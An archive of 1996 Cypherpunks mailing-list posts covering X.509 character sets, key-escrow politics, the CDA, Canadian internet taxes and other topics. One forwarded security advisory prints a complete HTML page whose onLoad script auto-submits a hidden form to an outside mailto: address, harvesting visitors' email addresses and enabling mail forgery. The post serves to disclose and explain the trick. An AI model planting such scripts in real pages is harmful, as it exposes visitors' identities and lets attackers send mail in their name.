> 48 character print chain) and some of the more extended alphabets.  In
> particular, X.500 has been amended to include BMPString within
> DirectoryString, and BMPString is essentially Unicode.  Now, there may
> be some who would argue that a 16 bit character isn't sufficient to
> represent every language in the galaxy (Old High Martian may have some
> additional requirements), but as a first approximation it should
> certainly good enough.

    I don't recall who made the comment that X.509 used IA5, but I was
the one who noted (wrongly?) that IA5 had no representation of the at
sign ("@"), and instead used a lower-case letter "a" inside of
parentheses.

    I remembered it then in context with all the work I'd done on the
X.400 projects tying together the DISA cc:Mail and the OSD MS-Mail
backbones, and I'm still quite convinced that at least in the context
of the systems we were using, this is exactly what IA5 meant.  There
was much wailing and gnashing of teeth over this one, because it made
our directory sync and directory query stuff all that much more of a
pain.  It could even have contributed to the stillbirth of those
projects, the omnipresent and oppressive spectre of DMS not
withstanding.


    Now, perhaps the definition of IA5 has changed, and if so, then
that's great.  Or maybe DISA and the X.400 we had (not too unrelated
to the formless but very chilling DMS) were badly broken and this is
what they made us live with.


    In any event, if X.509 certificates don't have this problem, then
that is wonderful.  It's another reason why we might want to support
X.509v3 certificates as an absolute minimum acceptable standard.

> And one of the virtues of ASN.1 is that a compliant implemtnation
> shouldn't have to be concerned with such details as the alphabet that
> is used.

    I await the wisdom of Steve Crocker to be visted upon us regarding
the use of ASN.1.  I do know that, from general principle, the mere
concept of being forced to go out and buy something like an ASN.1
compiler just so that I can implement a parser for a format seems
abhorrent in the extreme.  Not to mention the additional complexity,
unwieldiness, and sluggishness it lends to the final product.

-- 
Brad Knowles                           MIME/PGP: BKnowles@aol.net
    Mail Systems Administrator          <http:www.his.com/~brad/>
    for America Online, Inc.                   Ph: (703) 453-4148




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bullwinkle J. Moose" <abarrett@fractured.fairytales.com>
Date: Tue, 27 Feb 1996 03:22:59 +0800
To: cypherpunks@toad.com
Subject: Proposed Legislation Regualting Expert Testimony
Message-ID: <Pine.LNX.3.91.960226131642.9517A-100000@mail.ee.net>
MIME-Version: 1.0
Content-Type: text/plain



The following is an excerpt from a bill proposed to become law in the
State of New Mexico. (It did not succeed.) I wonder if the same sort
of thing should be enacted to apply to the testimony of economists?

"A BILL REGULATING EXPERT TESTIMONY IN COURTS. BILL____.

AN ACT RELATING TO EXPERT TESTIMONY IN COURTS; REGULATING THE
TESTIMONY OF CRYPTOLOGISTS AND COMPUTER EXPERTS IN THE
HEARINGS OF CRIMINAL DEFENDANTS IN COURTS; BE IT ENACTED BY THE
LEGISLATURE OF THE STATE OF NEW MEXICO;

When a cryptologist or computer expert testifies during a criminal
defendant's penalty hearing, the cryptologist or computer expert
shall wear a cone-shaped hat no less than two feet in height for the
duration of the hearing. The surface of the hat shall be imprinted
with stars, moons and lightning bolts.

Additionally, the cryptologist or computer expert shall be required to
wear a white beard no less than eighteen inches in length for the
duration of the hearing. The cryptologist or computer expert shall
punctuate crucial elements of his testimony by stabbing at the air
with a wand no less than one foot in length.

Whenever a cryptologist or computer expert provides expert testimony
regarding the defendant's methods, the bailiff of the court shall
dim the lights of the court room and shall administer two strikes to
a Chinese gong."


__________________________________________________________________
Out the buffer,         | PGP encrypted e-mail welcome!
Through the com port,   | Finger for Public Key.
Over the POTS line,     | Also available on a key server near you.
Into the NT Box,        |
Up the fractional T1,   | Key ID: 0x457AA6BD
Onto the backbone,      | Keyprint: 99 C7 17 3B 32 08 3F 17
Nothin' but  Net.       |           F4 A9 42 A9 2F BC 39 B1
------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Tue, 27 Feb 1996 03:19:49 +0800
To: cypherpunks@toad.com
Subject: proposed certificate format
Message-ID: <v02140b02ad57a96db758@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


In another forum, at 10:37 2/25/96, Bill Sommerfeld wrote:
>Subject: Re: encodings: do we need binary at all?

>I think the whole discussion of encoding is premature at
>this stage; let's decide on *what* we want to encode, and only *then*
>decide *how* to encode it.

To that end, I've written up in detail the kind of certificate
content I would like us to consider.  It is represented as ASCII encoding
[tag: value], but that is just for convenience in this discussion.

The detail description is in

        http://www.clark.net/pub/cme/html/cert.html

and I can e-mail it to anyone without web access.

Specifically, I believe there are shortcomings in X.509 and even worse
ones in PGP signed keys and I'm proposing a certificate structure
to overcome those shortcomings.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
|CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
|2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
|Reston, VA 22091      Tel: (703) 620-4200                                 |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 27 Feb 1996 06:01:11 +0800
To: cypherpunks@toad.com
Subject: JavaScript to grab e-mail <explained> (fwd)
Message-ID: <2.2.32.19960226212817.008a4e2c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


This is something that i had not seen posted here as of yet.  (Sorry if it
has.  My mail feed has been suffering from altzheimers as of late and
getting progressivly worse...)

Crypto Relevance:  None
Privacy Relevance: Lots

This was forwarded to me by the "CGI Guy" at Teleport.  I had heard this was
possible.  I was quite surprised to find just how *easy* this is!  I can see
a number of creative (and scary) uses for this little hack.  (This makes
JavaScript seem more like a coffee enema.)

--------- Forwarded message ---------------

>Well, here it is...  I've been yelling about Netscape's use of the 
>action="maito:user@place.com" for a long time.  By clicking on a submit 
>button (with any name) you can grab the user's email address, sig file 
>and other prefs.  
>
>JavaScript in Netscape 2.0 removes the necessary "click."  I'm sending 
>visitors to my site a notification of this problem.
>
>Robert Muhlestein
>Teleport Creative Services
>CGI Guy
>cgi@teleport.com
>
>---------- Forwarded message ----------
>Date: Mon, 26 Feb 1996 16:52:30 +0100
>From: Lincoln Stein <lstein@kaa.crbm.cnrs-mop.fr>
>To: www-managers@lists.stanford.edu, www-security@ns2.rutgers.edu
>Cc: lstein@pico.crbm.cnrs-mop.fr
>Subject: Re: JavaScript to grab e-mail <explained>
>
>I just had a look at the e-mail scamming script (URL
>http://www.popco.com/grabtest.html).  It's quite simple.  Here's the
>complete text:
>
><HTML>
><HEAD>
></HEAD>
><BODY onLoad="document.mailme.submit()">
>
><form method=post name="mailme"
>      action="mailto:reply@simenon.popco.com?subject=scammed address">
>
><h3>Viewing this page automatically submits email to an 
>address which then sends you back email to prove it grabbed the message.</h3>
>
><input type=hidden name="scammed.the.address" value="did it">
></form>
>
></BODY>
></HTML>
>
>Basically what the script does is to make the browser submit e-mail to
>the indicated mailto: URL.  When the mail is sent, the user's reply
>address is included as a matter of course.
>
>The good news is that this does _not_ represent a general security
>hole in JavaScript itself.  I was concerned that someone had
>discovered a way to make JavaScript divulge such browser secrets as
>the contents of the disk cache, history list, or newsgroup
>subscriptions.  
>
>The bad news is that this technique can be used as a general Internet
>e-mail forgery system.  Anybody accessing a particular page will
>unwittingly mail out an e-mail message, whose recipient, subject and
>message body are all under the control of the JavaScript author.  If
>the message is traced back, it will be found to have originated from
>the user's machine.
>
>Lincoln
>
>
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Tue, 27 Feb 1996 08:29:28 +0800
To: cypherpunks@toad.com
Subject: Wanted: Win95/NT C++/Crypto Contractor
Message-ID: <2.2.32.19960226224213.0144bf70@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain



Must have: 

        Good C++ skills
        Have shipped real code to real users
        Ability to work unsupervised
        Understanding of networking (TCP/IP) and World Wide Web (HTTP)
        Crypto experience (probably RSA BSAFE - we are still choosing).

Must be able to cite references for the above!

Rate and location negotiable - SF Bay / Silicon Valley preferred.

Contact:
        John Pettitt
        VP Engineering
        CyberSource Corporation
        1050 Chestnut St #201
        Menlo Park
        CA 94025
        Fax 415 473 3066
        jpp@software.net 

please send resumes as ASCII, MS Word, HTML/URL or PostScript only!

P.S. Please don't bug me on the phone!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 27 Feb 1996 05:30:32 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 25 Dec 1996
Message-ID: <01I1O9GN8B1CAKTN7G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu" 25-FEB-1996 20:33:13.72

>*****************************************************************
>Edupage, 25 February 1996.  Edupage, a summary of news items on information
>technology, is provided three times each week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

One wonders if they're trying this for all internet providers (unenforcable),
or just the ones setting up in that province (they'll leave).

>TAX MAN TARGETS CYBERSPACE
>The Nova Scotia government announced the province's 11% sales tax will be
>applied to Internet services, including flat monthly charges, time charges
>and registration, effective March 1. (Toronto Globe & Mail 23 Feb 96 B3)

Anyone know anything more about this?

>CASHLESS SOCIETY TO COST GOVERNMENTS
>A report prepared for the Bank of Canada says that the advent of the
>cashless society could cost the federal government hundreds of millions of
>dollars annually through a drop in the use of coins and bank notes that
>generate monopoly royalties for the central bank.  (Toronto Financial Post
>21 Feb 96 p1)

>Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
>(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

>***************************************************************
>EDUPAGE is what you've just finished reading.  To subscribe to Edupage: send
>a message to: listproc@educom.unc.edu and in the body of the message type:
>subscribe edupage Jean-Luc Godard (assuming that your name is Jean-Luc
>Godard;  if it's not, substitute your own name).  ...  To cancel, send a
>message to: listproc@educom.unc.edu and in the body of the message type:
>unsubscribe edupage.   (Subscription problems?  Send mail to
>educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@nowhere.toad.com (Senator Exon)
Date: Wed, 28 Feb 1996 20:25:17 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602261424.PAA10844@ddh.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


Greetings All
             Does anyone reading this know any details of the crypto
scheme proposed for TETRA (The Euro standard digital radio system).
 Actual concrete details of the system seem to be impossible to find !!

 Thanks in advance

 LP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 27 Feb 1996 05:27:40 +0800
To: Dave.Birch@eworld.com
Subject: Re: How to digitally watermark
Message-ID: <01I1O9T9OH3CAKTN7G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Adam Shostack <adam@homeport.org> wrote..
>>Creating watermarks that can't be removed without degrading
>>image quality is not especially difficult.  The two tricky bits are
>>durability and collusion protection.

	The difficulty I can see is with the "without degrading image quality"
part. Given ever-improving image enhancement and processing techniques, someone
probably could - or at least will be able to in the near future - take any
image in which the watermark didn't degrade the image by itself and remove
the watermark without _perceptible_ alterations in image quality. 

>I hope someone, somewhere finds this interesting...

	Yes, actually; I was just at a seminar on computer image interpretation
for the biomedical field.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 27 Feb 1996 08:49:58 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Remember, RC4 is now PC1
In-Reply-To: <199602261748.JAA20058@ix6.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.960226152809.22559B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 26 Feb 1996, Bill Stewart wrote:

> At 10:19 AM 2/24/96 -0800, jamesd@echeque.com wrote:
> >>From now, instead of saying "RC4" let us say "PC1, (formerly known as RC4)"
> ..
> >Every time you say RC4 without saying "Trademark of some bunch of 
> >lawyer scum" you theoretically break the lawyer made law.  So let us 
> >stop doing it.   Serve them right.
> 
> You can always call it "Ron's Code 4" or "Rivest's Code 4" or whatever.

Call it  "Prince"

Simon
---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 27 Feb 1996 09:09:36 +0800
To: cypherpunks@toad.com
Subject: Encrypted Communications Privacy Act
Message-ID: <199602270007.QAA08147@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Looks like good news for a change... Senator Leahy is expected to introduce
a bill tomorrow with some of the following language; no S-number as yet.

--------------------------------------------------------------------------

      "It is the purpose of the Act:

      (1) to ensure that Americans are able to choose the most appropriate
  encryption method to protect the security, confidentiality, and privacy of
  their lawful wire or electronic communications; and

      (2) to establish privacy standards for key holders who are voluntarily
  entrusted with the means to decrypt such communications, and procedures by
  which investigative or law enforcement officers may obtain assistance in
  decrypting such communications."

  AND:

      "Nothing in this Act or the ammendments made by this Act shall be
  construed to:

      (1) require the use by any person of any form of encryption;

      (2) limit or affect the ability of any person to use encryption without
  a key escrow function; or

      (3) limit or affect the ability of any person who choses to use
  encryption with a key escrow function not to use a key holder."

--------------------------------------------------------------------------

	Jim Gillogly
	Hevensday, 7 Rethe S.R. 1996, 00:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 27 Feb 1996 09:29:27 +0800
To: cypherpunks@toad.com
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <199602270041.QAA16809@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 22 Feb 96, John Young wrote and quoted Steve Walker:

> To supplement TIS's Web site information on CKE, here's a
> mailing from Steve Walker earlier this month:
> 
> 
> TRUSTED INFORMATION SYSTEMS, INC.
> 
> February 2, 1996
> 
> 
> There has been amazing progress on TIS's Commercial Key
> Escrow (CKE) initiative since my last status report.

<groan>

> By adding CKE technology to our firewalls, the Gauntlet
> system with DES and CKE now meets the U.S. government
> requirements for export to most parts of the world.

Oh, goody!

> While this temporary export license has limitations (there
> must be a Data Recovey Center in the U.S....

It's GAK (GAK!). Instead of one arm of the government
supposedly holding keys safe from unauthorized access by
another arm of the government, it will be a duly approved,
registered, regulated repository holding keys safe from 
unauthorized access by an arm of the government. Just like 
banks protect customers' funds and privacy... Gee! It sure 
sounds like utopia to me... utopia for government. Does 
anyone know of ANY regulated industry that exists at the 
pleasure of the government that also strenuously defends its 
customers' rights against government efforts? I think not.

> ...it represents the first export approval of a DES-based key
> escrow encryption system, a small step...

...backward.

> ...the private sector's need for encryption protection and
> governments' needs to be able to decrypt the communications
> of criminals, terrorists, and other adversaries...

There is no difference between the justification for this and 
what was offered to justify Clipper.  

"Other adversaries," like those who want to keep their affairs 
private, or wish to live free in an increasingly unfree world? 
I think I'm gonna puke.

> Other meetings will follow, but it appears that most major
> governments endorse the U.S. government's user-controlled
> key escrow initiative as the only practical way through the
> cryptography maze.

I AM gonna puke. Of COURSE most governments will go for this! 
The practical effect is essentially the same as if all paper 
mail were to be machine-copied and archived, only accessible 
with a "proper court order." Even though the government can 
go after your mail now, lawfully or UNlawfully, if they don't, 
it's gone -- it has no persistence in any system not under the 
control of sender or receiver, and as a practical matter ALL 
paper mail cannot be copied and archived by any third party. 
However, e-mail is rapidly replacing paper mail and some 
supposed advocates of crypto are helping the government ensure 
that MAIL of the future will have the potential to be a 
persistent "e-trail," something that paper mail could never be.

> In mid-January, Microsoft announced its long-awaited
> Cryptographic Application Programming Interface (CAPI). This
> development promises to finally provide a well-defined
> separation between applications calling on cryptography and
> the actual performance of the cryptography. Now users will be
> able to request cryptographic functions in hundreds of
> applications and select precisely which cryptography to use
> at the time of program execution rather than program
> purchase.

Yeah, I guess all the programmers in the world who DON'T work 
for Microsloth are just too darned stupid to have conceived of 
any such separation. Thank goodness MS made this possible! 
Now we can dispense with all those foolish delusions we once 
harbored and admit that all the DOS offline mail readers in the 
world that supported a configurable editor only *appeared* to 
interface to third-party crypto modules via editor interface 
layers... Now we can admit that we were mistaken in believing 
that Pegasus Mail was trivially equipped with a generic crypto 
interface and that an interface layer to PGP was released by 
another party within weeks...

> Cryptographic Service Providers (CSPs) can now
> evolve independent of applications, and users can choose
> whatever cryptography is available wherever they are in the
> world. TIS is working closely with CSP vendors to ensure that
> CSPs with good cryptography are available in domestic and
> exportable versions as soon as possible based on the U.S.
> government's key escrow initiative.

What self-serving bullshit.

> We would now have widespread use of encryption, both
> domestically and worldwide; we would be in a state of
> "Utopia," with widespread availability of cryptography with
> unlimited key lengths. But, once in this state, we will face
> situations where we need a file that had been encrypted by an
> associate who is unavailable (illness, traffic jam, or change
> of jobs). 

Yeah, this is a really good reason to flush privacy in 
communications down the toilet of subservience to limitless 
government. Really.

> +  Then in 1995, the U.S. government announced its key
>    escrow initiative: allow the export of up to 64-bit
>    cryptography (a remarkable concession) when accompanied
>    by an acceptable form of user-controlled key escrow
>    (critical component to this policy being that "an
>    acceptable escrow system" must have sufficient integrity
>    to give the government confidence that, with a warrant,
>    the keys will be available.)...

Of course. A remarkable arrogation of power rather than a 
concession: Laying the foundation for ALL communications to 
be available with a warrant, something the government has 
NEVER in its history enjoyed.

> Some in the computer industry labeled this just another
> form of Clipper and vowed to continue the fight against
> U.S. government regulation of encryption in any form -- 
> presumably forever. 

They were right and you are wrong in asserting that it would 
be "forever." These things solve themselves in time as
long as there is a plurality of political systems and national
interests on the planet. No government on earth can long
stand against irresistible forces.

> On the other hand, once the new escrowed encryption policy
> was announced, U.S. government agencies -- the FBI, NSA,
> White House, DoD, DoJ, NIST, and NSC -- closed ranks behind
> it and have shown little interest in discussing any other
> approaches. 

Sure. So throw in the towel, eh? If you can't fight 'em, JOIN 
'em. Right? <puke>

> In addition, neither political party has shown
> any interest in taking up the argument in the Congress,
> probably because it is a complex issue and there is no
> obvious "winning" position. 

That may be a compelling argument in favor of finding ways to 
send wakeup calls to the political machinery -- the kinds of 
calls that cause severe loss of sleep and the eruption of 
multitudinous beads of sweat -- but it is HARDLY an argument 
in favor of signing on, as it were, to GAK.

> But, depending upon how the definition of user-controlled key
> escrow is resolved, the new escrow policy could just be the
> long-sought compromise between government and industry that
> gets us through this morass.

What you mean, "Us," kimosabe? This whole piece you've written
is a superficial rationalization for shitcanning principle when
it is placed in opposition to corporate survival by presumed
higher authority. If this is the "long-sought compromise"
that "gets us through this morass," it is a textbook example
of the "turd in the punchbowl" dilemma. How small a turd
will you compromise on before you will consider the punch fit
to drink? Rather a large one, evidently. Then again, this
could be because you see yourself more as a purveyor of punch
than an imbiber. History repeats itself. Endlessly.

> +  If we can ensure that organizations can control the
>    security of backup access to their encrypted information
>    through well-designed commercial key recovery systems --
>    yet also ensure that governments have access when
>    justified via normal legal procedures -- we may have
>    truly found the "Ultimate Utopia" solution to a dilemma
>    that has existed all of our professional lives and
>    threatens to continue through the next generation...

What on earth gives you the idea that anyone outside
government wants to "ensure that governments have access when
justified?" Most individuals would prefer to have and use the
means to ensure that *no one* has access to their private
communications, "justified" or not. More death, torture,
mulilation, incarceration and confiscation have been
perpetrated by governments "justified" by laws valid in their
time and place than all the harm ever done by all the private
individuals in history. What is today's "justification" could 
well become tomorrow's crime against humanity.

>    Thus, in my thought experiment I have come to the
>    conclusion that we (industry and government) are all
>    heading towards the same objective...

If you're right, then maybe the whole thing needs to be 
dismantled and built again from the ground up. Really.

> ...but on a different path from what some of us originally
> wanted. 

Yes -- the path of totalitarianism, apparently.

> Yet, to my way of thinking, that path has to accomodate us
> all if we are ever to arrive at any mutually agreeable
> destination. 

False. Suppose you and your spouse wish to remain inviolate 
but the guy in the ski mask wants to sodomize you both? To 
your way of thinking, "that path has to accomodate us all if we 
are ever to arrive at any mutually agreeable destination."  
Good fucking luck.

> When one group of participants raises insurmountable barriers
> for another group, it simply blocks everyone from progressing
> down any path, and the net result is that U.S. industry is
> not able to export any good crypto-based security.

Although it's possible this may never have occurred to you,
maybe those who want to see strong crypto freely available
would prefer that as long as the U.S. insists on maintaining
self-destructive crypto policies they impact U.S. industry and
provide incentive for foreign crypto development rather than
see U.S. industry crawl supine and subservient to lick the
shoes of bureaucrats who are, after all, our employees and
(supposedly) our SERVANTS.  

What you are doing is going into agreement with the government 
and helping to take the pressure off the government, when what 
is really called for is a firm stand that keeps the 
responsibility for the consequences squarely where it belongs: 
on government hands. Caving while pretending to adhere to 
principle fosters that to which one caves. Standing firm is 
much more likely to force a change.  

You've CHOSEN to be in a business whose market reach is at the 
pleasure of the government. Not satisfied with the reach 
allowed you, you jump through quite a few logical hoops to 
rationalize why it's ok to tailor principle to the necessities 
attendant to navigating the obstacles to which you voluntarily 
made yourself subject in the first place. Perhaps you can see 
why I wouldn't trust you with the keys to my car, much less my
communications?

> We at TIS are dedicated to finding a solution acceptable to
> all sides. We ask your help in this struggle. If you want
> exportable cryptography routinely available in your lifetime
> and believe that user-controlled key recovery is an
> important, if not vital, capability...

The two have no natural connection. The unnatural connection
is created by government policy. As with the unnatural
connection established by a kidnapper between failure to meet
the demands and damage to the victim, you grant it legitimacy 
to the extent that you cave to it.

As far as exportable crypto in [our] lifetime... that will
take care of itself without your help. What you are doing
will DELAY it by appearing to address important issues while
in reality severely damaging the principle of maintaining
freedom of encryption by helping to establish a system in
which that freedom will not exist. 

> If you want to integrate exportable CKE into your product
> line, we are ready to help. 

Thanks, but no thanks.

> If you want to buy internationally deployable good
> cryptography with your favorite applications, tell your
> application vendor you want escrow-enabled applications.

No way, Jose! Most people who want it have access to PGP now, 
and already are using it with their favorite applications. 
The future can offer only more and better, regardless of 
present government policies.

Pegasus Mail showed that integration is not a big deal if
the software originates outside the U.S., so the direction is
established and obvious: As the many millions of programmers
around the world develop more and more advanced applications,
those apps increasingly will tend to have crypto interfaces. 
Those interested in crypto will buy foreign products. In the 
ABSENCE of efforts such as yours, the pressure on the U.S. 
government would rapidly become irresistible.

> We all have an opportunity to make a major difference here.

Yes indeed, and I have not the slightest desire to help you 
help the government institutionalize a bad policy.

>    Sincerely,
>    Stephen T. Walker

Stephen, you've gotten carried away with yourself. "Ultimate
Utopia" indeed! I'm reminded of the validity of the communist
quip that capitalists will sell them the rope with which to 
hang the capitalists. Seems there is some truth to that. 

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMTIbaEjw99YhtpnhAQFJ3gH/U532RzeENe1SbI2B4LCxXZCJYwksYipC
fSFsAX4hCudT9BBYc/wuGGle/TvejQuIChR8qoxw7sjIip4IWHakdw==
=x1iC
-----END PGP SIGNATURE-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Tue, 27 Feb 1996 09:00:38 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Canucks using weird money to pay odd taxes.
In-Reply-To: <01I1O9GN8B1CAKTN7G@mbcl.rutgers.edu>
Message-ID: <9602261759.ZM21160@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



On Feb 26,  3:16pm, E. ALLEN SMITH wrote:
> One wonders if they're trying this for all internet providers (unenforcable),
> or just the ones setting up in that province (they'll leave).
>
> >TAX MAN TARGETS CYBERSPACE
> >The Nova Scotia government announced the province's 11% sales tax will be
> >applied to Internet services, including flat monthly charges, time charges
> >and registration, effective March 1. (Toronto Globe & Mail 23 Feb 96 B3)

I *think* that the Federal GST already applies to internet services: 7% on
all goods and services, and internet service provider as a term seems to
leave you wide open. The suggestion that this would drive out ISPs trying
to set up in NS is odd; the tax will make internet access more expensive in
NS, but with distances what they are in Atlantic Canada, there aren't many
options for going elsewhere. If it does anything, it'll drive the customers
of ISPs away, probably to New Brunswick. (Frank McKenna's government in NB
has made wiring the province a crusade, to the point where it is probably
the best-wired province in Canada, and much of it would rank against Toronto,
Montreal or Ottawa for sheer connectivity. At a CATA conference a year or so
ago, someone talking about the SchoolNet initiative remarked that, "in New
Brunswick, the washrooms had wire.")


> >CASHLESS SOCIETY TO COST GOVERNMENTS

This topic probably mainly comes up since the government of Canada is
currently making a tidy amount on the doubloonie, our new $2CDN piece.
[Rather pretty, two-tone, unfortunately, the copperish centre tends to
 come out with a little pressure, leading to the term, "pieces of two".]
Um. I rather doubt that the Bank of Canada is most worried about losing
money because people aren't using its cash any more; their greater worry
I would expect to be that they'll lose what precious control they have
of the Canadian economy.

This tenuous grip (though driven from the south) is fairly precious, and
becomes more so when faced with the prospect of Quebec trying to run its
economy without a central bank or currency.

richard =)

-- 
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Grantham <casper@optima.mme.wsu.edu>
Date: Tue, 27 Feb 1996 10:48:15 +0800
To: "'Ludwig von Drakenberg III'" <drake@servidor.dgsca.unam.mx>
Subject: RE: CDA Strikes.
Message-ID: <01BB0475.B5574220@xtsd0311.it.wsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


So true, so true. 

Where on earth does the Government get the idea that they have the obligation or for that matter, the right to play parent. *sigh*

Chris

----------
From: 	Ludwig von Drakenberg III[SMTP:drake@servidor.dgsca.unam.mx]
Sent: 	Monday, February 26, 1996 1:19 AM
To: 	cypherpunks@toad.com
Subject: 	CDA Strikes.

Read this in http://www.zippo.com/editor.htm.

>                                    So what's the plan....man ?
>
>          So the CDA has come to pass and we need to move on. People will test the
>           constitutionality of bits and pieces of the Telecom Law, a conservative
>           supreme court will find the law valid, or refuse to review it. Things will never
>           be the same. For those who think they will be, or the for the" Don't worry,
>           President Clinton won't enforce the law" crowd, Friday marked the first arrest
>           under the new law. They picked an unsympathetic figure, twice before
>           convicted child pornographer, and got him for illegal data transmission over
>           the Internet. 

>           Next time it won't be such an unsympathetic figure. It will be some ISP,
>           minding their own business, not knowing they have a user that didn't read the
>           rules. They'll spend a year in federal court, defending their postion based on
>           not knowing they comitted a crime. In the end, they will win, but they'll be
>           broke, and out of the business. Won't happen to large providers, too political,
>           and they have the resources to do all of the CDA compliance window decorating.


-- 
Ludwig von Drakenberg III          God *is* the dice of the universe.
drake@servidor.unam.mx             My goddess gave birth to your god.
Facultad de Ciencias, UNAM                  Fuck the CDA

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzExbCgAAAEEAONJqT5AeaOg29oT2WXzpgkMQ/BxZXCiduJsOAWRRIPlkOQc
7RN2ooQKJmvHamhoaXktoIbmpK3fkPoEt4OONDtncmOKQKKKl9BgifUW9lO1msRp
W0WIGZ9wTlX/1j6RTcdAEEWqWlBi4xz8A7a3MJdoIANPOV1Zs6HEQwyN9No5AAUR
tCpFZHVhcmRvIEVzY2FsYW50ZSA8ZHJha2VAc2Vydmlkb3IudW5hbS5teD4=
=nmxM
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 27 Feb 1996 11:43:41 +0800
To: cypherpunks@toad.com
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <m0trFcJ-0008yzC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:41 PM 2/26/96 -0800, anonymous-remailer@shell.portal.com wrote:
>On 22 Feb 96, John Young wrote and quoted Steve Walker:
>> To supplement TIS's Web site information on CKE, here's a
>> mailing from Steve Walker earlier this month:

>> TRUSTED INFORMATION SYSTEMS, INC.
> February 2, 1996
>> There has been amazing progress on TIS's Commercial Key
>> Escrow (CKE) initiative since my last status report.
>

[Much quite-valid disgust with CKE (GAK!) deleted]

>> ...it represents the first export approval of a DES-based key
>> escrow encryption system, a small step...
>
>...backward.
>
>> ...the private sector's need for encryption protection and
>> governments' needs to be able to decrypt the communications
>> of criminals, terrorists, and other adversaries...
>
>There is no difference between the justification for this and 
>what was offered to justify Clipper.  
>
>"Other adversaries," like those who want to keep their affairs 
>private, or wish to live free in an increasingly unfree world? 
>I think I'm gonna puke.


Instead of "and other adversaries," why didn't they just come out and say, 
"and Jim Bell"?  I feel left out!  Ignored!   Now I know how "the 
Professor and Mary Ann" felt.

This is a social slight I can't possibly tolerate!

Jim Bell, Adversary.

jimbell@pacifier.com

Klaatu Burada Nikto

Something is going to happen...   Something...Wonderful!
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTJzNPqHVDBboB2dAQFROAQAge2OrsqHHnQ6fBPw2UWoWdiJcagwWspA
s8Zed6Rfeo/X3Hhuy6KT8AaRq2TwaHaiykaEaDMEzdRUhgKQi32pOP3/Pr/ISUqH
